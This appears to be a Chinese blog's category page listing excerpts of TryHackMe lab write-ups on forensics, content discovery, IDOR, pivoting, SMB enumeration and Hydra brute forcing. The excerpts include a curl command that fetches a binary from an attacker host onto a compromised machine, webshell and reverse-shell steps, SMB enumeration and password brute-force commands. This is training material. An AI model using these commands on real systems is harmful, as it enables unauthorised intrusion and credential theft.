tryhackme
关注
分享
扫一扫
文章平均质量分 82
唐仔橙
csdn少写了,请看github
展开
-
windows溯源取证,应急响应案例:tryhackme之 Investigating Windows
文章目录Investigating WindowsWhats the version and year of the windows machine?Which user logged in last?When did John log onto the system last?What IP does the system connect to when it first starts?What two accounts had administrative privileges (other than原创 2022-04-13 19:40:15 · 5049 阅读 · 0 评论 -
渗透测试之信息收集 -tryhackme-Content Discovery
文章目录什么是内容发现?1.robots.txt2.**Favicon**3.**Sitemap.xml**4.HTTP Headers5.手动发现 关于框架的资产6.google dorking/hacking7.Wappalyzer8.历史页面9.github10.S3等存储11.自动探测(文件 目录 api 子域名 等最重要的是字典!什么是内容发现?一般来说是指不容易被公共访问到的比如一些配置文件,管理员面板,备份文件等等,发现的方式:手动,自动,OSINT,1.robots.txt本意是原创 2021-12-08 21:02:48 · 2988 阅读 · 0 评论 -
tryhackme圣诞挑战2021-Advent of Cyber 3-day3-目录文件扫描,信息收集
文章目录背景资产发现&它的重要性路径文件爆破工具弱密码 默认密码挑战开始背景邪恶公司正在尽力组织圣诞公司内部的交流,破坏了邮件系统和McSysadmin的管理面板,你能找到管理面板并帮助圣诞公司恢复吗?这里就要用到机器了,需要下载vpn文件,连接vpn资产发现&它的重要性资产可以是文件,文件夹,路径等,不会轻易被公共访问的。如果我们能获取,会大大利于后面的行动,这些资产包括1.配置文件2.密码密钥3.备份文件4.内容管理系统5.管理员面板路径文件爆破工具常用的比如Di原创 2021-12-05 14:54:54 · 276 阅读 · 0 评论 -
tryhackme圣诞挑战2021-Advent of Cyber 3-day2-越权漏洞,修改cookie
背景McSkidy需要检查其他员工是否被入侵了,但是员工的信息被黑了,你能修补回来然后看看最好的圣诞公司里面还有哪些团队受到影响了吗?开始学习!HTTPSHTTP协议是网站常用的协议,常用的请求方法有get和postget一般用于请求数据post是发送数据GET请求包GET / HTTP/1.1Host: tryhackme.comUser-Agent: Mozilla/5.0 Firefox/87.0Referer: https://tryhackme.com/当服务器收到请求包原创 2021-12-05 14:31:32 · 3559 阅读 · 0 评论 -
tryhackme圣诞挑战2021-Advent of Cyber 3-day1-IDOR漏洞,不安全的访问控制漏洞
文章目录第一天IDOR漏洞是什么?通常出现的地方查询get请求post的表单的值cookies挑战初探挑战的问题第一天货物系统出现了问题,让我们想办法进行修复!IDOR漏洞是什么?Insecure Direct Object Reference,不安全的直接对象引用,是一种权限控制类漏洞,类似于越权漏洞吧,就是用户访问到了自己不应该访问的信息,比如我只能查看我自己的资料,但我可以通过修改一些参数访问其他人的资料。通常出现的地方查询get请求post的表单的值这里用户的id被隐藏了,如果修原创 2021-12-02 11:30:38 · 2669 阅读 · 0 评论 -
tryhackme之Wreath-3 渗透测试基础案例之内网渗透 继续进攻
文章目录3.继续进攻获得反弹shellcURL访问webshell先用webshell干点事在反弹shell前,先看一下它能否访问外网 方法也很多3.继续进攻往受害机器上上传nmap(静态编译好的)可以开一个python的http服务sudo python3 -m http.server 80在受害机器上执行curl ATTACKING_IP/nmap-USERNAME -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME原创 2021-08-15 13:32:18 · 477 阅读 · 0 评论 -
tryhackme之渗透测试基础案例之横向移动,内网渗透Wreath-2 pivoting
文章目录2.pivoting横移的第一步是收集信息下面会用两种工具ProxychainsFoxyProxySSH 隧道 / 端口转发正向连接反弹连接sshuttle2.pivoting通过一台机器,进而攻击内网其他机器(公网无法访问到)metasploit等工具可以很容易做到,手动:1.隧道/代理可以逃避简单的IDS的检测2.端口转发各有优缺吧,具体要看环境。先进一步探测一下看看再说从这一步开始绘制拓扑图如果获取了多个入口,Linux比较好横向移动metasploit有个命令可以直接原创 2021-08-15 13:27:57 · 872 阅读 · 0 评论 -
tryhackme之Wreath-1.渗透测试基础案例之初步信息收集+打点
前言:这是tryhackme的一大变化,出了一个系统的攻防的模拟环境,模拟前期打点,获取权限后,内网横向移动,以及最终打到个人PC等。这个系列文章正在更新。。文章目录1.初步信息收集+打点扫描,探测进一步的攻击吧!1.初步信息收集+打点给了一个工具包,推荐还是用最新的,密码是WreathNetworkPS‼️上传工具的话,别上传原始名字,改一下,比如工具名-你的昵称。因为大家是共用的这个环境。Linux:Ctrl+T 可以把任务隐藏在后台,当前终端继续使用故事背景:多年不联系的老朋友Thom原创 2021-08-15 13:23:20 · 547 阅读 · 0 评论 -
tryhackme之Walking An Application(web应用攻击初步探查
Application应用详解View Source - Use your browser to view the human-readable source code of a website.Inspector - Learn how to inspect page elements and make changes to view usually blocked content.Debugger - Inspect and control the flow of a page’s JavaSc原创 2021-08-15 13:03:37 · 776 阅读 · 0 评论 -
tryhackme--Kenobi
信息收集,nmap扫描Samba枚举利用nmap的脚本nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target发现三个分享进行smb连接smbclient //<ip>//sharename又是一个 未设置密码就可以登录的,发现有一个文件在里面递归下载文件(不用用户名密码)smbget -R smb://<ip>...原创 2020-12-11 11:41:33 · 559 阅读 · 4 评论 -
tryhackme-2020圣诞挑战-day10
SMB (Server Message Block) - Natively supported by Windows and not Linux NFS (Network File System) - Natively supported by Linux and not WindowsSamba windows和Linux都支持,而且是加密传输枚举,利用enum4linux-U进行用户探测 ,发现三个用户-S 选项获取分享列表,有四个提示说有原创 2020-12-11 10:31:55 · 279 阅读 · 0 评论 -
tryhackme之Hydra
tryhackme之Hydra一、Hydra是什么?二、使用方法1.ftp2.ssh3.提交web表单三、解题1、Use Hydra to bruteforce molly's web password. What is flag 1?2、Use Hydra to bruteforce molly's SSH password. What is flag 2?一、Hydra是什么?二、使用方法1.ftpFTP:hydra -l user -P passlist.txt ftp://machine_原创 2020-10-09 11:11:35 · 572 阅读 · 0 评论